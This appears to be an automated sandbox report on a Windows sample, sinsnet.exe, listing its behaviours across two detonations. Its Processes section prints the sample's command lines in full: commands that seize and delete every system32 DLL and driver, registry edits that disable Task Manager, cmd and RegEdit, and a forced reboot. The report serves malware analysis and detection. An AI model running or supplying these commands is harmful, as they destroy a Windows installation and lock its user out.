Malware Analysis Report

2024-11-16 12:47

Sample ID 240806-l346xawfkp
Target sinsnet.exe
SHA256 aa4f0ac95d9dafa33ccd20a7d94d4387bf4ac89132077905480dfcadbef861e8
Tags discovery, evasion, exploit
Score 8/10

Analysis Overview

Score 8/10

SHA256 aa4f0ac95d9dafa33ccd20a7d94d4387bf4ac89132077905480dfcadbef861e8

Threat Level: Likely malicious

The file sinsnet.exe was found to be: Likely malicious.

Malicious Activity Summary

discovery evasion exploit

Disables cmd.exe use via registry modification

Disables RegEdit via registry modification

Disables Task Manager via registry modification

Possible privilege escalation attempt

Checks computer location settings

Modifies file permissions

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Modifies registry key

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of SetWindowsHookEx

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-06 10:04

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-06 10:04

Reported

2024-08-06 10:07

Platform

win10v2004-20240802-en

Max time kernel

147s

Max time network

147s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
(24 identical events)

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
(48 identical events)

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\shutdown.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
(64 identical events)

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 752 wrote to memory of 3668 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 752 wrote to memory of 452 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 752 wrote to memory of 408 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 1796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 2820 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 3432 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 752 wrote to memory of 3660 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 3668 wrote to memory of 4280 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 752 wrote to memory of 704 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 452 wrote to memory of 3384 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 752 wrote to memory of 4532 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 452 wrote to memory of 3672 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 752 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 2868 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4476 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4604 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4252 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 2036 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 3668 wrote to memory of 3224 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 752 wrote to memory of 5040 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 3720 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 752 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 1932 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 3256 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4844 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 752 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
(each write is logged twice in the sandbox output)

Processes

C:\Users\Admin\AppData\Local\Temp\sinsnet.exe

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\*.dll && icacls c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f c:\windows\system32\drivers\* && icacls c:\windows\system32\drivers\* /grant Everyone:(F) && del /s /q c:\windows\system32\drivers\* && exit

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableCMD /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\*.dll

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\takeown.exe

takeown /f c:\windows\system32\drivers\*

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\drivers\* /grant Everyone:(F)

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\shutdown.exe

"C:\Windows\System32\shutdown.exe" -r -t 0

C:\Windows\system32\LogonUI.exe

"LogonUI.exe" /flags:0x4 /state0:0xa3962855 /state1:0x41c64e6d

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 84.162.74.23.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/752-0-0x00007FF673FE0000-0x00007FF674181000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

C:\Windows\Debug\WIA\wiatrace.log

memory/752-4-0x00007FF673FE0000-0x00007FF674181000-memory.dmp

memory/752-27-0x00007FF673FE0000-0x00007FF674181000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-06 10:04

Reported

2024-08-06 10:06

Platform

win7-20240708-en

Max time kernel

103s

Max time network

104s

Command Line

"C:\Users\Admin\AppData\Local\Temp\sinsnet.exe"

Signatures

Disables RegEdit via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Disables cmd.exe use via registry modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD = "1" C:\Windows\System32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Windows\System32\mspaint.exe N/A

Enumerates physical storage devices

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\shutdown.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\shutdown.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A
N/A N/A C:\Windows\System32\mspaint.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2688 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\cmd.exe
PID 2688 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2808 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2692 wrote to memory of 2752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2692 wrote to memory of 2752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2692 wrote to memory of 2752 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2688 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2812 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 1760 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2688 wrote to memory of 2540 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\reg.exe
PID 2816 wrote to memory of 2568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2816 wrote to memory of 2568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2816 wrote to memory of 2568 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 2688 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2816 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2816 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2816 wrote to memory of 2640 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2688 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2688 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\notepad.exe
PID 2692 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2692 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2692 wrote to memory of 2112 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 2688 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
PID 2688 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\sinsnet.exe C:\Windows\System32\mspaint.exe
